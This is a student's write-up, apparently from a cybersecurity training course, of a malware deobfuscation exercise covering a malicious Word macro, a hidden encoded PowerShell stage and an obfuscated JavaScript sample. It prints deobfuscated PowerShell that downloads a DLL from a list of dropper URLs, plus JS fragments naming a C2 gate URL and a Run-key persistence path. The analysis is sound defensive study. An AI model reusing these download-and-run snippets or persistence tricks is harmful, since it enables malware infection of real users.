{"id":1620,"date":"2021-11-03T21:10:42","date_gmt":"2021-11-03T21:10:42","guid":{"rendered":"https:\/\/cas.cybercop-training.ch\/?page_id=1620"},"modified":"2021-11-03T21:18:55","modified_gmt":"2021-11-03T21:18:55","slug":"a14-deobfuscation","status":"publish","type":"page","link":"https:\/\/cas.cybercop-training.ch\/index.php\/a14-deobfuscation\/","title":{"rendered":"A14: Deobfuscation"},"content":{"rendered":"<h1>Assignment Series #A14 &#8211; Deobfuscation<\/h1>\n<h2>Part 1 &#8211; VBA Analysis<\/h2>\n<blockquote><p>Given is a maliscious wordfile (sample.doc).<br \/>\nBe careful and don&#8217;t open this in word!<\/p><\/blockquote>\n<ol>\n<li>Run olevba to have a look at the obfuscated code inside the maldoc.<\/li>\n<li>Have a look at the code.\n<ol>\n<li>How is the execution of the code triggered?<\/li>\n<li>What obfuscation techniques have been used?<\/li>\n<\/ol>\n<\/li>\n<li>See how far you get with manual deobfuscation of the code.\n<ol>\n<li>Describe the steps you took.<\/li>\n<li>Any idea what the VBA part of this malware does?<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<p><img decoding=\"async\" src=\"https:\/\/cas.cybercop-training.ch\/wp-content\/uploads\/2021\/11\/01.png\" alt=\"\" \/><\/p>\n<p>Let&#8217;s run olevba!<\/p>\n<blockquote><p>olevba sample1.doc<\/p><\/blockquote>\n<p><img decoding=\"async\" src=\"https:\/\/cas.cybercop-training.ch\/wp-content\/uploads\/2021\/11\/02.png\" alt=\"\" \/><\/p>\n<p>What info do we get so far?<\/p>\n<ul>\n<li>The code runs immediately when the word file is opened! (Of course if you ignore the warning and enable the macro content)<\/li>\n<li>Further we get the info that it executes a file or system command trough WMI<\/li>\n<li>It may create an OLE Object<\/li>\n<li>Some parts are encoded with base64 (option &#8211;decode)<\/li>\n<\/ul>\n<p>If we scroll above I can see the extracted VBA Code. Based on the exercsises I guess the following techniques are being used:<\/p>\n<ul>\n<li>Name Mangling<\/li>\n<li>Dead Code insertation<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"https:\/\/cas.cybercop-training.ch\/wp-content\/uploads\/2021\/11\/03.png\" alt=\"\" \/><\/p>\n<p>Another hint we get is that base64 encoded strings were detected.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cas.cybercop-training.ch\/wp-content\/uploads\/2021\/11\/04.png\" alt=\"\" \/><\/p>\n<p>The base64 decoded strings are <code>sadsaccc<\/code> and <code>sasdsacc<\/code><\/p>\n<p>That&#8217;s a pattern we often see in the source code:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cas.cybercop-training.ch\/wp-content\/uploads\/2021\/11\/05.png\" alt=\"\" \/><\/p>\n<p>Manual code deobfusction is very time intense. It also require a good understanding of a specific programming language.<br \/>\nMy guess is that the malware starts a hidden powershell or cmd with some encoded strings that contacts a specific CC Server or malware dropper URL&#8217;s.<\/p>\n<p>Becuase lack of time, VBA knowledge I&#8217;d go ahead and check sources like virustoal or use vipermonkey instead which go a step further than OLEVBA and emulate the VBA code.<\/p>\n<p>Often when a malware is spread in the wild someonme catch it and share the analysis with the community. Virustotal is always a good source for that.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cas.cybercop-training.ch\/wp-content\/uploads\/2021\/11\/06.png\" alt=\"\" \/><\/p>\n<p>Just give vipermonkey a try. A cool thing is that it can be run via a simple docker command.<\/p>\n<blockquote><p>.\/dockermonkey.sh \/home\/hacker\/Reversing\/re-deobfuscation\/Sample.doc<\/p><\/blockquote>\n<p>For some reasons Vipermonkey doesn&#8217;t work anymore. In the previous deobfuscation exercise it worked like a charm, but I used an older hackinglab release.<\/p>\n<p>Because this is not part of the exercise and troubleshooting costs a lot of time I&#8217;ll go to the next part.<br \/>\nTroublehooting Discussion:<br \/>\n<a href=\"https:\/\/githubmemory.com\/repo\/kirk-sayre-work\/ViperMonkey\/issues\/31\">https:\/\/githubmemory.com\/repo\/kirk-sayre-work\/ViperMonkey\/issues\/31<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cas.cybercop-training.ch\/wp-content\/uploads\/2021\/11\/07.png\" alt=\"\" \/><\/p>\n<h2>Part 2 &#8211; Powershell Analysis<\/h2>\n<p>When you were done with the VBA analysis you ended up with something like this:<\/p>\n<blockquote><p>powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQ &#8230; CcAKQA =<\/p><\/blockquote>\n<p>Any idea what that could be? To get started on analyzing the program launched in PowerShell, have a<br \/>\nlook at what the -enc option does!<\/p>\n<p>I guess that&#8217;s a base64 encoded string<\/p>\n<ol>\n<li>Create a CyberChef recipe which gets you as far as possible.<br \/>\n\u2022 You can export the recipe by using \u201cSave Recipe\u201d and copying from \u201cChef Format\u201d.<\/li>\n<li>What obfuscation techniques have been used?<\/li>\n<li>What does the PowerShell part of this malware do?<\/li>\n<\/ol>\n<p>I&#8217;ve tried to create the following cyberchef recipe:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">From_Base64('A-Za-z0-9+\/=',true)\r\nDecode_text('UTF-16LE (1200)')\r\nFind_\/_Replace({'option':'Regex','string':'\\\\-'},' ',true,false,true,false)\r\nFind_\/_Replace({'option':'Regex','string':'\\\\`'},'',true,false,true,false)\r\nFind_\/_Replace({'option':'Regex','string':'\\\\.'},'',true,true,true,true)\r\nFind_\/_Replace({'option':'Regex','string':'\\\\\\''},'',true,false,true,false)\r\nFind_\/_Replace({'option':'Regex','string':'\\\\,'},'',true,false,true,false)\r\nFind_\/_Replace({'option':'Regex','string':'\\\\+'},'',true,false,true,false)\r\nFind_\/_Replace({'option':'Regex','string':'\\\\('},'',true,false,true,false)\r\nFind_\/_Replace({'option':'Regex','string':'\\\\)'},'',true,false,true,false)\r\nTo_Lower_case()<\/pre>\n<p>I&#8217;ve used the base64 decoder and set text to UTF-16LE.<\/p>\n<p>It&#8217;s more readable than before, but still unsatisfied.<br \/>\nIf I compare with the diagram from virustotal above I can see the contacted domains, but there still some crap left \ud83d\ude41<\/p>\n<p>The main obfuscation techniques I&#8217;ve detected so far are <code>base64 encoding<\/code>, <code>decomposition<\/code> and <code>adding unnecessary escape characters<\/code><\/p>\n<p>The correct deobfuscated code should look like this:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">set-variable \"T4Kd6\" [type]\"SYsTem.Io.DIrectOrY\"\r\nset 428 [type]\"SYstEM.nET.sERViCEPoINtMaNager\"\r\n$jrnzmks = $a16l + \"!\" + $y11f\r\n$m20m = \"O18W\"\r\n(item \"VArIABlE:T4kD6\").value:createdirectory($home + \"\\\\Snuvw2w\\\\V4651pz\\\\\")\r\n$e20v = \"B13A\"\r\n$428:securityprotocol = \"Tls12\"\r\n$e_9q = \"G91N\"\r\n$wsxw52z = \"H64C\"\r\n$l04n = \"V16F\"\r\n$xdn5xhg = $home + \"\\\\Snuvw2w\\\\V4651pz\\\\\" + $wsxw52z + \".d\" + \"ll\"\r\n$x28g = \"W01E\"\r\n$o338_77 = \"http\"\r\n$xap1lma = (\"http:\/\/coworkingplus.es\/wp-admin\/FxmME\/!http:\/\/silkonbusiness.matrixinfotechsolution.com\/js\/q26\/!https:\/\/bbjugueteria.com\/s6kscx\/Z\/!https:\/\/www.bimception.com\/wp-admin\/sHy5t\/!http:\/\/armakonarms.com\/wp-includes\/fz\/!http:\/\/alugrama.com.mx\/t\/2\/!http:\/\/homecass.com\/wp-content\/iF\/\").split($o53u + $jrnzmks + $u_2d)\r\n$q99p = \"F88S\"\r\nforeach ($mzuchj6 in $xap1lma) {\r\n  try {\r\n    (new-object system.net.webclient).downloadfile($mzuchj6, $xdn5xhg)\r\n    $c57b = \"C29C\"\r\n    if ((get-item $xdn5xhg).length -ge 47669) {<\/pre>\n<p>Source: <a href=\"https:\/\/tria.ge\/210405-19qv8q8jns\/behavioral1\">https:\/\/tria.ge\/210405-19qv8q8jns\/behavioral1<\/a><\/p>\n<p>The script will create a directory and then contact different malware dropper URL&#8217;s<\/p>\n<h2>Part 3 &#8211; Automated analysis with PSDecode<\/h2>\n<ol>\n<li>Use PSDecode to analyze the above mentioned code. Compare with the result of your manual<br \/>\nanalysis.<\/li>\n<li>Where did the automated analysis fail? Any idea why?<\/li>\n<li>Can you overcome this and manually figure out what the malware does?<\/li>\n<\/ol>\n<p>I do prefer powershell analysis in a windows box than in a linux box. Sadly my Win10 Lab VM where I&#8217;ve played around with Ghidra and other stuff is no longer working. I&#8217;ve to use another one&#8230;<\/p>\n<blockquote><p>Install-Module -Name PSDecode<\/p><\/blockquote>\n<p>That single command didn&#8217;t work. Copy PSDecode.ps1 to Powershell Module Folder<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cas.cybercop-training.ch\/wp-content\/uploads\/2021\/11\/08.png\" alt=\"\" \/><\/p>\n<blockquote><p>set-executionpolicy unrestricted<br \/>\nImport-Module PSDecode<\/p><\/blockquote>\n<p>Copy obfuscated powershell script to a file and name it <code>enc.ps1<\/code><\/p>\n<blockquote><p>PSDecode enc.ps1<\/p><\/blockquote>\n<p>Decoding process with the steps above looks pretty common<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cas.cybercop-training.ch\/wp-content\/uploads\/2021\/11\/09.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cas.cybercop-training.ch\/wp-content\/uploads\/2021\/11\/10.png\" alt=\"\" \/><br \/>\nAfter Layer3 it crashes:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cas.cybercop-training.ch\/wp-content\/uploads\/2021\/11\/11.png\" alt=\"\" \/><br \/>\nAt the moment I&#8217;ve no explanation why the <code>unexpected token errors<\/code> occured. As you can see above that I did also struggle with the cyberchef recipe and was not fully able to deobfuscate it. I think my muscles are not trained enough yet \ud83d\ude09<\/p>\n<h2>Part 4 &#8211; JavaScript Analysis<\/h2>\n<blockquote><p>Given is a specific js Malwaresample<\/p><\/blockquote>\n<ol>\n<li>Have a look at the code. What obfuscation techniques have been used?<\/li>\n<li>See how far you get with manual deobfuscation of the code.\n<ol>\n<li>Describe the steps you took.<\/li>\n<li>Can you devise what this malware does?<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<p>If I&#8217;ve a look on that code it looks ugly obfuscated!<\/p>\n<p>I&#8217;d guess nearly every obfuscation technique has been used that is described in the theory part:<\/p>\n<ul>\n<li>Code Bloating<\/li>\n<li>Name Mangling<\/li>\n<li>Control Flow Rerouting<\/li>\n<li>Data Transformation and Distribution<\/li>\n<\/ul>\n<p>I use a JS Deobfuscator\/Beautifier tool to made the code more readable<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cas.cybercop-training.ch\/wp-content\/uploads\/2021\/11\/12.png\" alt=\"\" \/><\/p>\n<p>Sample from the code:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">var _0x317f = ['120430XXVIfh', '278099EkyzbF', 'Content-Type', 'length', 'charAt', 'quit', 'specialfolders', 'MSXML2.ServerXMLHTTP', '624145xRuAmy', 'savetofile', 'ExpandEnvironmentStrings', 'Microsoft.XMLHTTP', 'RegDelete', 'fromCharCode', 'startup', '340843SSemfJ', 'scriptname', 'getTime', '|JS', 'deletefile', '224534NDdNec', '%USERNAME%', 'REG_SZ', 'wscript.shell', '997048hdfOCk', 'RegWrite', 'responseText', 'replace', 'split', 'random', 'expandenvironmentstrings', 'send', '427228dSLRBw', 'substr', 'HKCU\\x5cSoftware\\x5cbolt\\x5cGUID', ':\/\/', 'indexOf', 'http:\/\/voubucleonteri.xyz\/dimpan\/gate.php', 'RegRead', 'copyfile', 'HKCU\\x5csoftware\\x5cmicrosoft\\x5cwindows\\x5ccurrentversion\\x5crun\\x5c', 'setRequestHeader', 'open', 'floor', 'regdelete', 'User-Agent', '%APPDATA%', 'application\/x-www-form-urlencoded', 'wscript.exe\\x20\/\/B\\x20', 'scriptfullname', 'regwrite', 'type', 'files\/'];\r\nvar _0x23b0 = function(_0x25aefc, _0x2105e3) {\r\n    _0x25aefc = _0x25aefc - 0x1c0;\r\n    var _0x317f0b = _0x317f[_0x25aefc];\r\n    return _0x317f0b;<\/pre>\n<p>Here we can See a URL of a potential CC Server, some registry commands and it seems that wscript is beeing used to download files.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cas.cybercop-training.ch\/wp-content\/uploads\/2021\/11\/13.png\" alt=\"\" \/><\/p>\n<h2>Part 5 &#8211; Automated Deobfuscating<\/h2>\n<ol>\n<li>Use js-box to analyze the above mentioned maldoc. Compare with the result of your manual<br \/>\nanalysis.<\/li>\n<li>How far did the analysis get you? What\u2019s missing?<\/li>\n<\/ol>\n<p>Emulation is always an interessting approach to see what the code does. With js-box it&#8217;s possible to detect quickly which URL or possible CC Server the Script tries to contact. The JS Deobuscator Tool helped also a lot to made the code more readable.<\/p>\n<p>We got two IOC:<\/p>\n<ul>\n<li>Script read a specific registry key<\/li>\n<li>Script fetched an URL<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"https:\/\/cas.cybercop-training.ch\/wp-content\/uploads\/2021\/11\/14.png\" alt=\"\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Assignment Series #A14 &#8211; Deobfuscation Part 1 &#8211; VBA Analysis Given is a maliscious wordfile (sample.doc). Be careful and don&#8217;t open this in word! Run olevba to have a look at the obfuscated code inside the maldoc. Have a look at the code. How is the execution of the code triggered? What obfuscation techniques have [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1620","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/cas.cybercop-training.ch\/index.php\/wp-json\/wp\/v2\/pages\/1620","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cas.cybercop-training.ch\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cas.cybercop-training.ch\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cas.cybercop-training.ch\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/cas.cybercop-training.ch\/index.php\/wp-json\/wp\/v2\/comments?post=1620"}],"version-history":[{"count":3,"href":"https:\/\/cas.cybercop-training.ch\/index.php\/wp-json\/wp\/v2\/pages\/1620\/revisions"}],"predecessor-version":[{"id":1639,"href":"https:\/\/cas.cybercop-training.ch\/index.php\/wp-json\/wp\/v2\/pages\/1620\/revisions\/1639"}],"wp:attachment":[{"href":"https:\/\/cas.cybercop-training.ch\/index.php\/wp-json\/wp\/v2\/media?parent=1620"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}